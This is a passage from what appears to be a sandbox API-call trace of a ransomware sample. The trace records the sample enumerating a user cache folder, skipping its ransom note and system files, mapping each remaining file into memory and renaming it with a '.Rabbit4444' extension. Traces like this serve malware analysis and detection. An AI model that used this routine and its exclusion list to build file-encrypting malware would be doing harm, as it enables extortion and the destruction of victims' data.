lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0068.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" [0068.677] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\" [0068.677] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" [0068.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.679] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.683] FlushFileBuffers (hFile=0x228) returned 1 [0068.683] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.684] CloseHandle (hObject=0x228) returned 1 [0068.684] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned 117 [0068.684] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.684] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2418ea0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0068.684] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.684] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.684] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.684] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.684] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2418ea0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.685] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.685] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.685] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.685] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.685] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.685] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2418ea0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2418ea0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf243ed7c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.685] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x12e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0068.685] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0068.685] lstrcpyW (in: lpString1=0x130ec24, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0068.685] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0068.686] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0068.686] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0068.686] lstrlenW (lpString="Rabbit4444") returned 10 [0068.686] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0068.686] lstrlenW (lpString=".dll") returned 4 [0068.686] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0068.686] lstrlenW (lpString=".lnk") returned 4 [0068.686] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0068.686] lstrlenW (lpString=".ini") returned 4 [0068.686] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0068.686] lstrlenW (lpString=".sys") returned 4 [0068.686] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0068.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.687] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.687] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15999752744) returned 1 [0068.687] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=302) returned 1 [0068.687] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.687] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0068.687] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x29c [0068.688] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0068.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0068.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.690] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16000028414) returned 1 [0068.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0068.690] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.690] CloseHandle (hObject=0x29c) returned 1 [0068.690] CloseHandle (hObject=0x280) returned 1 [0068.690] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444") returned 161 [0068.690] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157.rabbit4444"), dwFlags=0x1) returned 1 [0068.691] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc487bf98, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", cAlternateFileName="6BADA8~1")) returned 1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="Rabbit4444.exe") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".") returned 1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="..") returned 1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="windows") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="bootmgr") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="pagefile.sys") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="boot") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="ids.txt") returned -1 [0068.691] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="NTUSER.DAT") returned -1 [0068.691] lstrcpyW (in: lpString1=0x130ec24, lpString2="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" [0068.691] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2020) returned 1 [0068.691] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2004) returned 1 [0068.692] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned 65 [0068.692] lstrlenW (lpString="Rabbit4444") returned 10 [0068.692] lstrcmpiW (lpString1="4792417E04", lpString2="Rabbit4444") returned -1 [0068.692] lstrlenW (lpString=".dll") returned 4 [0068.692] lstrcmpiW (lpString1="7E04", lpString2=".dll") returned 1 [0068.692] lstrlenW (lpString=".lnk") returned 4 [0068.692] lstrcmpiW (lpString1="7E04", lpString2=".lnk") returned 1 [0068.692] lstrlenW (lpString=".ini") returned 4 [0068.692] lstrcmpiW (lpString1="7E04", lpString2=".ini") returned 1 [0068.692] lstrlenW (lpString=".sys") returned 4 [0068.692] lstrcmpiW (lpString1="7E04", lpString2=".sys") returned 1 [0068.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.692] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.692] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16000303361) returned 1 [0068.692] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=434) returned 1 [0068.692] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.692] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0068.692] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c0, lpName=0x0) returned 0x29c [0068.697] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x70000 [0068.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0068.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16000900791) returned 1 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0068.698] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.698] CloseHandle (hObject=0x29c) returned 1 [0068.699] CloseHandle (hObject=0x280) returned 1 [0068.699] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444") returned 194 [0068.699] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04.rabbit4444"), dwFlags=0x1) returned 1 [0068.699] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0068.699] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.699] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.699] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0068.699] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0068.699] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0068.700] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0068.700] lstrcpyW (in: lpString1=0x130ec24, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0068.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0068.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0068.700] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0068.700] lstrlenW (lpString="Rabbit4444") returned 10 [0068.700] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0068.700] lstrlenW (lpString=".dll") returned 4 [0068.700] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0068.700] lstrlenW (lpString=".lnk") returned 4 [0068.700] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0068.700] lstrlenW (lpString=".ini") returned 4 [0068.700] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0068.700] lstrlenW (lpString=".sys") returned 4 [0068.700] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0068.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.701] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16001166809) returned 1 [0068.701] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=290) returned 1 [0068.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.701] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x29c [0068.703] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0068.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0068.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 